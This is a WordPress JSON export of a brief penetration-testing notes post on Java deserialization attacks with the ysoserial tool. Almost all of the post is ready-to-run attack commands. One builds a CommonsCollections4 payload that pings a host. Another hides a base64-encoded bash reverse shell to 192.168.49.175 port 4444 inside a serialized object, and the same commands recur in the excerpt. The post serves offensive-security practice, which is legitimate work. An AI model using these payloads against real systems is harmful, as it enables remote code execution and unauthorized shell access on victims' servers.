{"id":2660,"date":"2021-02-02T14:32:23","date_gmt":"2021-02-02T13:32:23","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2660"},"modified":"2023-12-24T12:30:39","modified_gmt":"2023-12-24T11:30:39","slug":"java","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2660","title":{"rendered":"<span class=\"caps\">JAVA<\/span>"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">If you can pro\u00advide a seri\u00adal\u00adized (.ser) file, try to cre\u00adate a pay\u00adload direct\u00adly, if you have the source code, or just use a <a href=\"https:\/\/github.com\/frohoff\/ysoserial\/\">yose\u00adr\u00adi\u00adal<\/a> payload.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 \"ping -c 4 192.168.49.175\" &gt; \/tmp\/recycler.ser\n\/\/ Prepare a reverse shell command line an transform it into b64.\njava -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}\" &gt; \/tmp\/recycler.ser<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/github.com\/frohoff\/ysoserial\">Dese\u00adri\u00adal\u00adiza\u00adtion attack tool<\/a><\/li>\n\n\n\n<li>https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet <\/li>\n\n\n\n<li>See also https:\/\/book.hacktricks.xyz\/pentesting-web\/deserialization#java-http<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>If you can pro\u00advide a seri\u00adal\u00adized (.ser) file, try to cre\u00adate a pay\u00adload direct\u00adly, if you have the source code, or just use a yose\u00adr\u00adi\u00adal pay\u00adload. java \u2011jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 \u201cping \u2011c 4 192.168.49.175\u201d &gt; \/tmp\/recycler.ser \/\/ Pre\u00adpare a reverse shell com\u00admand line an trans\u00adform it into b64. java \u2011jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 \u201cbash \u2011c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}\u201d [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[268,349],"class_list":["post-2660","post","type-post","status-publish","format-standard","hentry","category-general","tag-java","tag-language"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2660"}],"version-history":[{"count":4,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2660\/revisions"}],"predecessor-version":[{"id":3707,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2660\/revisions\/3707"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}